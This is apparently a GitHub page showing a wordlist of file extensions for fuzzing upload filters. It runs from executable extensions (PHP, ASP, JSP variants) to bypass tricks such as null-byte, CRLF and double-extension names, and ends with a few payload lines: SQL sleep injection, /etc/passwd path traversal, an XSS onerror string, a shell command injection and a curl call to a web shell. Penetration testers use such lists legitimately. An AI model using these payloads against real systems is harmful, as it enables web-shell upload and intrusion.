-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathextention.txt
211 lines (211 loc) · 1.41 KB
/
extention.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
avi
ASP
ASPX
PHP5
PHP
PHP3
htaccess
SVG
GIF
CSV
XML
AVI
HTML
JS
PNG
JPEG
ZIP
PDF
PPTX
SCF
pht
phtml
php3
php4
php5
php6
inc
jspx
jspf
jsw
sv
pHp
Php
phP
shellphpjpg
shellphp%00jpg
shellphp\x00jpg
php
php7
phps
phar
phpt
pgif
phtm
php%00gif
php\x00gif
php%00png
php\x00png
php%00jpg
php\x00jpg
filephp%20
filephp%0d%0ajpg
filephp%0a
pHP5
PhAr
html
txt
htm
aspx
asp
js
css
pgsqltxt
mysqltxt
pdf
cgi
gif
jpg
swf
xml
cfm
xhtml
wmv
zip
axd
gz
png
doc
shtml
jsp
ico
exe
csi
incphp
config
jpeg
ashx
log
xls
old
mp3
com
tar
ini
asa
tgz
flv
bak
rar
asmx
xlsx
page
dll
JPG
asax
msg
pl
csv
cssaspx
ppt
nsf
Pdf
Gif
bmp
sql
Jpeg
Jpg
xmlgz
Zip
new
psd
rss
wav
action
db
dat
do
xsl
class
mdb
avif
php2
php€¥
.htaccess
hphp
ctp
module
aspq
cshtm
cshtml
rem
soap
vbhtm
vbhtml
cer
sp:
jsv
wss
shtm
jhtml
cfml
py
rb
cfg
tar.gz
docx
conf
cfc,
dbm
Flash:
.swf
Perl
.pl,
pl,
web
wasm
wadl
resx
wsdl
xsd
cs
json
yml
yaml
targz
sln
php%20
php%0a
php%00
php/
php.\
x%
php....
pHp5....
png.pHp5
php#.png
php%00.png
php\x00.png
php%0a.png
php%0d%0a.png
phpJunk123png
png.jpg.php
php%00.png%00.jpg
shell.aspx;1.jpg
shell.soap
php%00.gif
php\x00.gif
php%00.jpg
php\x00.jpg
php......
php%0d%0a.jpg
%E2%80%AEphp.jpg
asax:.jpg
j\sp
phpD.jpg
poc.js'(select*from(select(sleep(20)))a)+'.jpg
.png../../../../../../../etc/passwd
'"><img src=x onerror=alert(document.domain)>.png
../../../tmp/lol.png
; sleep 10;
curl 'http://localhost/test.php?0=system' --data "1='ls'"